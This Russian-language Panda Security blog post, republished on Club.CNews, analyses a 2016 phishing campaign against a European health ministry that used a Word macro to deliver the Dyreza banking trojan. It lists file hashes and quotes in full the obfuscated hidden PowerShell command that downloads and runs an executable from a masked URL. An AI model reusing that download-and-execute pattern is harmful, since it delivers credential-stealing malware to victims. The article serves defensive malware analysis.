Главная » Блоги Экспертов И ИТ-Компаний » Нейтрализована вредоносная программа, способная парализовать работу целого министерства

Нейтрализована вредоносная программа, способная парализовать работу целого министерства

Кибер-угрозы представляют собой постоянный риск, и они способны в значительной степени влиять на работу государственных органов. Настолько, что они становятся мощным инструментом агрессии против государственных учреждений и граждан. Они способны привести к серьезному ухудшению в качестве обслуживания, а также, помимо всего прочего, к утечке данных, начиная от персональной информации и заканчивая государственной тайной.

Комбинация новых технологий и повышение уровня сложности атак, а также рост профессионального уровня кибер-преступников – все это представляет собой высокую степень опасности. Именно эти тенденции мы ожидаем в 2017 году.

В декабре прошлого года произошла мощная спам-кампания, которая охватила более десятка стран, но в особенности была направлена против одного из  значимых европейских министерств. Атака, реализованная с помощью фишинга, была очень продвинутой и сочетала техники социальной инженерии с мощным трояном.

Атака запускалась с письма в электронной почте, в котором был вложен документ Word. Сначала мы подозревали, что это была направленная атака, т.к. сообщение пришло якобы из медицинской компании, а получателем был сотрудник Министерства здравоохранения в одной из европейских стран.

Нижеприведенный анализ описывает технические особенности вредоносного кода, встроенного в макросе документа Word. Задача макроса заключалась в скачивании и запуске другого вредоносного компонента.

Характеристики 

Ниже приведено несколько статичных свойств анализируемых файлов.

Хэш документа Word:

MD5:  B480B7EFE5E822BD3C3C90D818502068

SHA1:  861ae1beb98704f121e28e57b429972be0410930

В соответствии  с метаданными документа, дата создания – 19 декабря 2016 года. Сигнатура вредоносного кода, скачиваемого «вордом»:

MD5:  3ea61e934c4fb7421087f10cacb14832

SHA1:  bffb40c2520e923c7174bbc52767b3b87f7364a9


 Реализация  

1.  Векторы заражения 

Документ Wordпопал на компьютер жертвы из спамового электронного письма, отправленного якобы из медицинской компании. Текст в письме пытается заставить получателя поверить в то, что содержимое защищено, а потому необходимо запустить макрос для получения доступа к нему.


По данным из Коллективного разума компании PandaSecurity, эта спамовая кампания началась 19 декабря 2016 года и поразила несколько стран.


Большинство получателей попытались открыть этот документ Wordв тот же день, когда и получили его, т.е. 19 декабря.

 

2. Взаимодействие с зараженной системой

Основная функция макроса состоит в том, чтобы скачать и запустить другой вредоносный код с того URL, что встроен внутри макроса.

Макрос создан таким образом, чтобы запускаться сразу же после его открытия.

Часть кода, содержащегося в макросе:

 

После того как макрос запускался, документ Wordзапускал следующую команду в системе:

cmd.exe /c pOWeRsHELL.EXe   -eXecUTIONpolICy   BYPAss  -noPrOfIlE -winDowsTyle    hidDEN (NeW-oBjECt    sYstEm.NeT.webcLiENt).DOWNloAdFILE(‘http://xxxxxxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe’,’C:\Users\????\AppData\Roaming.Exe’);STaRt-PRoCESS ‘C:\Users\????\AppData\Roaming.eXe’

Команда (cmd.exe) запускает powershellс двумя встроенными командами, определенными специальными параметрами:

  1. Первая команда powershellскачивает EXEс этого URL (в %APPDATA%.exe): http://xxxxxxxx.com/13obCpHRxA1t3rbMpzh7iy1awHVm1MzNTX.exe
  2.  Он создает файл в корне APPDATA.

  3. Следующая команда powershell (Start-process) используется для запуска скаченного файла.

Благодаря данным, полученным платформой Коллективного разума компании PandaSecurity, мы знаем, что последний вредоносный код, который будет распространяться в рамках этой кампании, - это вариант семейства угроз Dyreza. Клиенты Panda были проактивно защищены, а потому в данном случае не потребовались сигнатуры или обновления.

Цель вредоносного кода – кража учетных данных из браузеров и добавление скомпрометированной машины в бот-сеть. После этого компьютер ожидает команды с удаленного сервера управления. Эти команды поступают от кибер-преступников, которые управляют этим «зловредом», и они позволяют скачивать новые вредоносные программы и выполнять все виды вредоносных действий.

Оцифровка в области государственного управления привела к экспоненциальному росту объемов конфиденциальных данных в цифровом виде, которые необходимо создавать, хранить и управлять. Причем далеко не всегда можно осуществлять единый контроль над всеми этими данными.

 

Оригиналстатьи: Malware Capable of Paralyzing an Entire Ministry Neutralized

 

Panda Security вРоссии

 +7(495)105 94 51, marketing@rus.pandasecurity.com

 http://www.pandasecurity.com

 

 


Данный материал является частной записью члена сообщества Club.CNews.
Редакция CNews не несет ответственности за его содержание.
Комментарии
Другие публикации
RU, Екатеринбург
+7(495)1059451
Информационные технологии

С момента своего создания в 1990 году, компания Panda Security стала одним из ведущих европейским транснациональным производителем передовых решений и сервисов информационной безопасности с опциями расширенной защиты, а также инструментов управления и контроля над компьютерами и ИТ-системами. Компания последовательно придерживается духа инноваций и отмечена рядом наиболее важных достижений в своей сфере.

Компания Panda Security – это лидирующий европейский EDR-производитель со 100% европейским составом акционеров, штаб-квартирой, технологиями и облачной платформой. Ее современная и эффективная модель информационной безопасности стала визитной карточкой, которая позволила компании получить многочисленные официальные сертификаты, такие как сертификация по общим критериям Common Criteria или сертификаты Национального криптологического центра (National Cryptology Center).

Компания имеет представительства в более чем 80 странах мира, а ее продуктами, переведенными на 23 языка, пользуются миллионы клиентов во всем мире.

https://www.cloudav.ru

 

 




Забыли пароль?
Зарегистрируйся сейчас!
Присоединяйся к нашему обществу для того чтобы познакомиться с новыми людьми, создать собственный блог, публиковать анонсы событий и объявления, а также участвовать в обсуждении публикаций CNews. Мы создали единое пространство для общения специалистов рынка информационных технологий и всех, кто интересуется современными технологиями. Регистрация =>